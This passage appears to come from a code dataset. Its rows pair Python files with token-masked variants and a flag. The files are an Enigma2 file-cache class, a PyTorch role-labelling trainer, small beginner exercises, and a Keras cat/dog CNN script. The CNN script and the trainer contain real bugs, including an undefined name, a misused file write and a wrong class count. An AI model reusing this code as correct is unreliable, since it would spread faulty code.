getDirsFromCacheForPath(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):\n\t\t\tsubdirlist = self.cacheDirectoryList[path]\n\t\t\treturn subdirlist\n\t\telse:\n\t\t\treturn None\n\n\tdef getFilesFromCacheForPath(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheFileList.has_key(path):\n\t\t\tfilelist = self.cacheFileList[path]\n\t\t\treturn filelist\n\t\telse:\n\t\t\treturn None\n\n\tdef IsPathInCache(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef IsPathWithDirsInCache(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef IsPathWithFilesInCache(self, path):\n\t\tif config.EMC.files_cache.value and self.cacheFileList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef delPathFromCache(self, path):\n\t\tif len(path)>1 and path[-1]==\"/\":\n\t\t\tpath = path[:-1]\n\t\tprint \"EMC delPathFromCache\", path\n\t\tif self.cacheDirectoryList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheDirectoryList[path])\n\t\t\tdel self.cacheDirectoryList[path]\n\t\tif self.cacheFileList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheFileList[path])\n\t\t\tdel self.cacheFileList[path]\n#\t\tself.debugPrintDirCache()\n#\t\tself.debugPrintFileCache()\n#\t\tself.debugPrintFileAttributeCache()\n\n\tdef delPathFromDirCache(self, path):\n\t\tif len(path)>1 and path[-1]==\"/\":\n\t\t\tpath = path[:-1]\n\t\tif self.cacheDirectoryList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheDirectoryList[path])\n\t\t\tdel self.cacheDirectoryList[path]\n\n\tdef delPathFromFileCache(self, path):\n\t\tif len(path)>1 and path[-1]==\"/\":\n\t\t\tpath = path[:-1]\n\t\tif self.cacheFileList.has_key(path):\n\t\t\tself.deleteAssociatedListEntries(self.cacheFileList[path])\n\t\t\tdel self.cacheFileList[path]\n\n\tdef debugPrintFileCache(self):\n\t\tprint \"cacheFileList:\"\n\t\tfor p in self.cacheFileList:\n\t\t\tprint p,self.cacheFileList[p]\n\t\tprint \"\"\n\n\tdef debugPrintDirCache(self):\n\t\tprint \"cacheDirectoryList:\"\n\t\tfor p in self.cacheDirectoryList:\n\t\t\tprint p,self.cacheDirectoryList[p]\n\t\tprint \"\"\n\n\tdef debugPrintFileAttributeCache(self):\n\t\tprint \"cacheAttributeList:\"\n\t\tfor p in self.cacheAttributeList:\n\t\t\tprint p,self.cacheAttributeList[p]\n\t\tprint \"\"\n\n\tdef deleteAssociatedListEntries(self, list):\n\t\tfor p, n, e in list:\n\t\t\tif p in self.cacheAttributeList and (config.EMC.check_dead_links.value != \"only_initially\"):\n\t\t\t\tdel self.cacheAttributeList[p]\n\nmovieFileCache = EMCFileCache()\n" ]
true
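The cache sample above is Python 2 (print statements, dict.has_key), which is presumably why this row is flagged error=true and its steps list holds only the raw source. The caching idea itself ports cleanly to Python 3; a minimal sketch with illustrative names, not EMC's actual API:

# Minimal Python 3 sketch of the same idea: cache os.path attribute lookups
# per path so repeated directory listings avoid hitting the filesystem.
import os

class PathAttributeCache:
    def __init__(self):
        self._attrs = {}  # path -> (is_link, is_dir, is_file)

    def lookup(self, path):
        # Fill the cache lazily on first access.
        if path not in self._attrs:
            self._attrs[path] = (os.path.islink(path),
                                 os.path.isdir(path),
                                 os.path.isfile(path))
        return self._attrs[path]

    def invalidate(self, path):
        # Drop every cached entry under `path` after a file operation;
        # the trailing "/" avoids matching "a/bc" when path is "a/b".
        prefix = path.rstrip("/") + "/"
        for p in list(self._attrs):
            if p == path or p.startswith(prefix):
                del self._attrs[p]

cache = PathAttributeCache()
print(cache.lookup("/tmp"))  # e.g. (False, True, False)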
18
038ccba05113fb7f2f589eaa7345df53cb59a5af
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import torch
from torch import nn, autograd
import config
import time
import copy
import progressbar as pb
from dataset import TrainDataSet
from model import BiAffineSrlModel
from fscore import FScore

config.add_option('-m', '--mode', dest='mode', default='train', type='string', help='[train|eval|pred]', action='store')
config.add_option('--seed', dest='seed', default=1, type='int', help='torch random seed', action='store')


def train(num_epochs=30):
    lossfunction = nn.CrossEntropyLoss()
    trainset = TrainDataSet()
    model = BiAffineSrlModel(vocabs=trainset.vocabs)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.01)

    since = time.time()
    # keep a copy of the weights that score best on the dev set
    best_model_wts = copy.deepcopy(model.state_dict())
    best_f = FScore()
    for epoch in range(num_epochs):
        print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
        print('-' * 10, file=sys.stderr)
        for phase in ['train', 'dev']:
            model.train(phase == 'train')
            running_loss = 0.0
            running_f = FScore()

            for sentence in pb.progressbar(trainset.get_set(phase)):
                model.zero_grad()
                role_p = model(*sentence['inputs'])
                _, predict = torch.max(role_p, 1)
                loss = lossfunction(role_p, autograd.Variable(sentence['targets'][0]))
                if phase == 'train':
                    loss.backward()
                    optimizer.step()
                if epoch > 28:  # debug dump of predictions near the end of training
                    print(predict.data)
                    print(sentence['targets'][0])
                running_loss += loss.data[0]
                running_f.update(predict, sentence['targets'][0])

            print('\n{} Loss: {:.4f} {}'.format(phase, running_loss, running_f), file=sys.stderr)

            if phase == 'dev' and running_f > best_f:
                best_f = running_f
                best_model_wts = copy.deepcopy(model.state_dict())
        print('', file=sys.stderr)

    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(
        time_elapsed // 60, time_elapsed % 60), file=sys.stderr)
    print('Best val F: {}'.format(best_f), file=sys.stderr)

    model.load_state_dict(best_model_wts)
    return model


if __name__ == '__main__':
    config.parse_args()
    torch.manual_seed(config.get_option('seed'))
    mode = config.get_option('mode')
    if mode == 'train':
        train()
    else:
        raise NotImplementedError()
[ "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport torch\nfrom torch import nn, autograd\nimport config\nimport time\nimport copy\nimport progressbar as pb\nfrom dataset import TrainDataSet\nfrom model import BiAffineSrlModel\nfrom fscore import FScore\n\nconfig.add_option('-m', '--mode', dest='mode', default='train', type='string', help='[train|eval|pred]', action='store')\nconfig.add_option('--seed', dest='seed', default=1, type='int', help='torch random seed', action='store')\n\ndef train(num_epochs = 30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, autograd.Variable(sentence['targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss, running_f), file=sys.stderr)\n\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n\n model.load_state_dict(best_model_wts)\n return model\n\n\nif __name__ == '__main__':\n config.parse_args()\n torch.manual_seed(config.get_option('seed'))\n mode = config.get_option('mode')\n if mode == 'train':\n train()\n else:\n NotImplementedError()\n", "import sys\nimport torch\nfrom torch import nn, autograd\nimport config\nimport time\nimport copy\nimport progressbar as pb\nfrom dataset import TrainDataSet\nfrom model import BiAffineSrlModel\nfrom fscore import FScore\nconfig.add_option('-m', '--mode', dest='mode', default='train', type=\n 'string', help='[train|eval|pred]', action='store')\nconfig.add_option('--seed', dest='seed', default=1, type='int', help=\n 'torch random seed', action='store')\n\n\ndef train(num_epochs=30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, autograd.Variable(sentence[\n 'targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n 
print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss,\n running_f), file=sys.stderr)\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,\n time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n model.load_state_dict(best_model_wts)\n return model\n\n\nif __name__ == '__main__':\n config.parse_args()\n torch.manual_seed(config.get_option('seed'))\n mode = config.get_option('mode')\n if mode == 'train':\n train()\n else:\n NotImplementedError()\n", "<import token>\nconfig.add_option('-m', '--mode', dest='mode', default='train', type=\n 'string', help='[train|eval|pred]', action='store')\nconfig.add_option('--seed', dest='seed', default=1, type='int', help=\n 'torch random seed', action='store')\n\n\ndef train(num_epochs=30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, autograd.Variable(sentence[\n 'targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss,\n running_f), file=sys.stderr)\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,\n time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n model.load_state_dict(best_model_wts)\n return model\n\n\nif __name__ == '__main__':\n config.parse_args()\n torch.manual_seed(config.get_option('seed'))\n mode = config.get_option('mode')\n if mode == 'train':\n train()\n else:\n NotImplementedError()\n", "<import token>\n<code token>\n\n\ndef train(num_epochs=30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, 
autograd.Variable(sentence[\n 'targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss,\n running_f), file=sys.stderr)\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,\n time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n model.load_state_dict(best_model_wts)\n return model\n\n\n<code token>\n", "<import token>\n<code token>\n<function token>\n<code token>\n" ]
false
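The training loop in sample 18 uses the classic keep-the-best-dev-weights pattern from pre-0.4 PyTorch (autograd.Variable, loss.data[0]). A compact sketch of the same pattern in modern PyTorch, with placeholder model/loader names rather than this repo's API:

# Sketch of the best-on-dev checkpoint pattern in post-0.4 PyTorch:
# tensors replace autograd.Variable and loss.item() replaces loss.data[0].
import copy
import torch

def fit(model, optimizer, loss_fn, loaders, num_epochs=30):
    best_state, best_metric = copy.deepcopy(model.state_dict()), float("-inf")
    for epoch in range(num_epochs):
        for phase in ("train", "dev"):
            model.train(phase == "train")
            total, correct = 0, 0
            with torch.set_grad_enabled(phase == "train"):
                for inputs, targets in loaders[phase]:
                    optimizer.zero_grad()
                    logits = model(inputs)
                    loss = loss_fn(logits, targets)
                    if phase == "train":
                        loss.backward()
                        optimizer.step()
                    correct += (logits.argmax(1) == targets).sum().item()
                    total += targets.numel()
            metric = correct / max(total, 1)
            if phase == "dev" and metric > best_metric:
                best_metric, best_state = metric, copy.deepcopy(model.state_dict())
    model.load_state_dict(best_state)  # restore the best dev weights
    return model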
19
b5180a2dbe1f12e1bbc92874c67ea99c9a84a9ed
# print all cards with even numbers.

cards = ["2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A"]

for card in cards:
    try:
        number = int(card)
        if number % 2 == 0:  # modulo operator
            print(card, "is an even card.")
    except ValueError:
        print(card, "cannot be divided")
[ "\n# print all cards with even numbers.\n\ncards = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\", \"A\"]\n\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0: # modulo operator\n print(card, \"is an even card.\")\n except ValueError:\n print (card, \"can not be divided\")\n", "cards = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n", "<assignment token>\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n", "<assignment token>\n<code token>\n" ]
false
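The card sample above uses the EAFP idiom ("easier to ask forgiveness than permission"): attempt int() and catch the ValueError. For contrast, a short LBYL version that checks before converting:

cards = ["2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A"]
evens = [c for c in cards if c.isdigit() and int(c) % 2 == 0]
print(evens)  # ['2', '4', '6', '8', '10']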
20
a045423edd94d985dfc9660bcfe4a88c61bf4574
# Script start
print "This is the two number subtraction python program."
a = 9
b = 2
c = a - b
print c

# Script close
[ "#Script start\nprint\"This is the two number subtraction python program.\"\na = 9\nb = 2\nc = a - b\nprint c\n\n# Scrip close\n" ]
true
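This row is Python 2 (print is a statement there), so a Python 3 parser cannot tokenize it; that is presumably why error is true and the steps list holds only the raw source. The Python 3 equivalent:

# Python 3 version of the subtraction sample above.
a = 9
b = 2
c = a - b
print(c)  # 7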
21
13c9f0f58ec6da317c3802f594bb0db7c275dee9
'''
!pip install wget
from zipfile import ZipFile
import wget
print('Beginning file download with wget module')

url = 'https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip'
wget.download(url, 'sample_data/')


print('2. Extract all files in ZIP to different directory')

# Create a ZipFile Object and load sample.zip in it
with ZipFile('sample_data/kagglecatsanddogs_3367a.zip', 'r') as zipObj:
    # Extract all the contents of zip file in different directory
    zipObj.extractall('content/')

'''


import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
import pickle
import random
import datetime
import time
import tensorflow as tf
from tensorflow.python.keras.datasets import cifar10
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator


from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout
from tensorflow.python.keras.layers import Conv2D, MaxPooling2D
from tensorflow.python.keras.optimizers import Adam

from tensorflow.python.keras.callbacks import TensorBoard


DATADIR = 'content/PetImages'
CATEGORIES = ['Cat', 'Dog']  # the two classes we have to deal with
img_array = []

for category in CATEGORIES:
    path = os.path.join(DATADIR, category)  # path to cats and dogs dir
    for img in os.listdir(path):
        img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
        plt.imshow(img_array, cmap='gray')
        plt.show()

        print(img_array)
        print(img_array.shape)

        break
    break


IMG_SIZE = 299  # every image resized to 299x299
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
plt.imshow(resized_img_array, cmap='gray')  # cmap = hot, plasma, cool, ...
plt.show()


training_data = []


def create_training_data():  # creating training datasets
    for category in CATEGORIES:
        path = os.path.join(DATADIR, category)  # path to cats and dogs dir

        classIndex = CATEGORIES.index(category)  # 0 for Cat and 1 for Dog

        for img in os.listdir(path):
            try:
                img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)

                resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
                training_data.append([resized_img_array, classIndex])
            except Exception as e:
                pass  # skip unreadable or corrupt images


create_training_data()

print(len(training_data))


# shuffle the training data
random.shuffle(training_data)

# for sample in training_data[:10]:
#     print(sample[1])

x = []
y = []
for features, label in training_data:
    x.append(features)
    y.append(label)
x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)  # Keras needs a numpy array, not a list
y = np.array(y)  # integer class labels, one per image

pickle_out = open("x.pickle", 'wb')
pickle.dump(x, pickle_out)
pickle_out.close()

pickle_out = open('y.pickle', 'wb')
pickle.dump(y, pickle_out)
pickle_out.close()

pickle_in = open('x.pickle', 'rb')
x = pickle.load(pickle_in)
pickle_in = open('y.pickle', 'rb')
y = pickle.load(pickle_in)


x = x / 255.0  # scale pixel values to [0, 1]
INPUT_SHAPE = x.shape[1:]  # (299, 299, 3)
DROPOUT = 0.2
NB_CLASSES = 2  # cat and dog (the original said 10, which does not match this dataset)
NB_EPOCHS = 10
BATCH_SIZE = 128
VALIDATION_SPLIT = 0.2
OPTIMIZER = Adam()


# best validation accuracy/loss seen so far; accuracy is reported in [0, 1],
# so the original starting value of 70.0 could never be exceeded
best_acc, best_loss, accIndex, lossIndex = 0.0, 4.0, 1, 1
date = datetime.datetime.now()

dense_layers = [2, 1, 0]
layer_sizes = [512, 256, 128, 64]
conv_layers = [3, 2, 1]

for dense_layer in dense_layers:
    for layer_size in layer_sizes:
        for conv_layer in conv_layers:
            NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time()))
            print(NAME)
            # the (conv, nodes, dense) combination, used below in checkpoint
            # file names (the original referenced an undefined name CBP)
            CBP = (conv_layer, layer_size, dense_layer)

            model = Sequential()

            model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
            model.add(Activation('relu'))
            model.add(MaxPooling2D(pool_size=(2, 2)))

            for l in range(conv_layer - 1):
                model.add(Conv2D(layer_size, (5, 5)))
                model.add(Activation('relu'))
                model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
                model.add(Dropout(DROPOUT))

            model.add(Flatten())

            for _ in range(dense_layer):
                model.add(Dense(layer_size))
                model.add(Activation('relu'))
                model.add(Dropout(DROPOUT))

            model.add(Dense(NB_CLASSES))
            model.add(Activation('softmax'))

            tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))

            # sparse_categorical_crossentropy because y holds integer class
            # indices rather than one-hot vectors
            model.compile(loss='sparse_categorical_crossentropy',
                          optimizer=OPTIMIZER,
                          metrics=['accuracy'],
                          )

            history = model.fit(x, y,
                                batch_size=BATCH_SIZE,
                                epochs=NB_EPOCHS,
                                validation_split=VALIDATION_SPLIT,
                                verbose=1,
                                callbacks=[tensorboard])
            if history.history.get('val_acc')[-1] > best_acc:
                best_acc = history.history.get('val_acc')[-1]
                if accIndex >= 2:
                    os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1, round(best_acc, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
                # note: model.save() returns None, so the pickle below only
                # records a placeholder; the real artifact is the saved model file
                val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex, round(best_acc, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"), "wb")
                pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex, round(best_acc, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")),
                            val_acc_out)
                val_acc_out.close()
                accIndex += 1

                # the file '{}_pickle'.format(accIndex - 1) is never written
                # above, so this read-back would raise FileNotFoundError and
                # is disabled:
                # pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')
                # p_upload = pickle.load(pickle_upload)
                # print(p_upload)

            if history.history.get('val_loss')[-1] < best_loss:
                best_loss = history.history.get('val_loss')[-1]
                if lossIndex >= 2:
                    os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1, round(best_loss, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"))
                # 'wb' was missing here, which made the pickle.dump below fail
                val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(best_loss, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"), "wb")
                pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(best_loss, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")),
                            val_loss_out)
                val_loss_out.close()
                lossIndex += 1


model.save('64x3-CNN.model')


CATEGORIES = ['Cat', 'Dog']  # must match the training label order: 0 = Cat, 1 = Dog


def prepare(filepath):
    IMG_SIZE = 299  # 50 in txt-based
    img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)  # read in the image in color
    resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))  # resize image to match model's expected sizing
    return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)  # return the image with shaping that TF wants


model = tf.keras.models.load_model("64x3-CNN.model")
prediction = model.predict(prepare('dog.jpg'))
print(prediction)  # one softmax row per image
print(prediction[0][0])  # probability of class 0 (Cat)
# argmax picks the most probable class; the original indexed with
# int(prediction[0][0]), which only works for a single sigmoid output
print(CATEGORIES[int(np.argmax(prediction[0]))])


# We can also test our cat example:

prediction = model.predict(prepare('cat.jpg'))
print(prediction)
print(CATEGORIES[int(np.argmax(prediction[0]))])


'''
alpha. Also referred to as the learning rate or step size. The proportion that weights are updated (e.g. 0.001). Larger values (e.g. 0.3) result in faster initial learning before the rate is updated. Smaller values (e.g. 1.0E-5) slow learning right down during training.
beta1. The exponential decay rate for the first moment estimates (e.g. 0.9).
beta2. The exponential decay rate for the second-moment estimates (e.g. 0.999). This value should be set close to 1.0 on problems with a sparse gradient (e.g. NLP and computer vision problems).
epsilon. Is a very small number to prevent any division by zero in the implementation (e.g. 10E-8).

We can see that the popular deep learning libraries generally use the default parameters recommended by the paper. TensorFlow: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08. Keras: lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0. Blocks: learning_rate=0.002, beta1=0.9, beta2=0.999, epsilon=1e-08, decay_factor=1. Lasagne: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08 Caffe: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08 MxNet: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8 Torch: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8 '''
[ "'''\n!pip install wget\nfrom zipfile import ZipFile\nimport wget\nprint('Beginning file downlaod with wget module')\n\nurl = 'https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip'\nwget.download(url, 'sample_data/')\n\n\nprint('2. Extract all files in ZIP to different directory')\n\n # Create a ZipFile Object and load sample.zip in it\nwith ZipFile('sample_data/kagglecatsanddogs_3367a.zip', 'r') as zipObj:\n # Extract all the contents of zip file in different directory\n zipObj.extractall('content/')\n\n'''\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nimport pickle\nimport random\nimport datetime\nimport tensorflow as tf\nfrom tensorflow.python.keras.datasets import cifar10\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator\n\n\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout\nfrom tensorflow.python.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.python.keras.optimizers import Adam\n\nfrom tensorflow.python.keras.callbacks import TensorBoard\n\n\nDATADIR = 'content/PetImages'\nCATEGORIES = ['Cat', 'Dog'] #'''categories that we have to deal with'''\nimg_array= []\n\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category) # path to cats and dogs dir\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n\n print(img_array)\n print(img_array.shape)\n\n break\n break\n\n\nIMG_SIZE = 299 #every image of 299x299\nresized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\nplt.imshow(resized_img_array, cmap='gray') # cmap = hot, plasma, cool,\nplt.show()\n\n\ntraining_data = []\ndef create_training_data(): # creating training datasets\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category) # path to cats and dogs dir\n\n classIndex = CATEGORIES.index(category) # 0 for dog and 1 for cat\n\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\ncreate_training_data()\n\nprint(len(training_data))\n\n\n\n'''shuffle training data'''\nrandom.shuffle(training_data)\n\n\n\n# for sample in training_data[:10]:\n# print(sample[1])\n\n\n\nx=[]\ny=[]\nfor features, label in training_data:\n x.append(features)\n y.append(label)\nx = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3) #we can't pass a list to keras for training\n #'''we have to pass here a numpy array '''\n\n# print(x[0].reshape(-1, IMG_SIZE, IMG_SIZE, 1))\n\n\npickle_out = open(\"x.pickle\", 'wb')\npickle.dump(x, pickle_out)\npickle_out.close()\n\npickle_out= open('y.pickle', 'wb')\npickle.dump(y, pickle_out)\npickle_out.close()\n\npickle_in = open('x.pickle', 'rb')\nx = pickle.load(pickle_in)\npickle_in = open('y.pickle', 'rb')\ny = pickle.load(pickle_in)\n\n\nx = x / 255.0\nINPUT_SHAPE = x.shape[1:]#(224, 224, 3)\nDROPOUT=0.2\nNB_CLASSES=10\nNB_EPOCHS=10\nBATCH_SIZE=128\nVALIDATION_SPLIT=0.2\nOPTIMIZER = Adam()\n\n\nmax, min, accIndex , lossIndex=70.0 , 4.0, 1, 1\ndate = datetime.datetime.now()\n\ndense_layers = [2, 1, 0] # 0, 1,2\nlayer_sizes = [512, 256, 128, 64] #32, 64, 128, 256, 512\nconv_layers = [3, 2, 1] # 1, 2,3\n\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for 
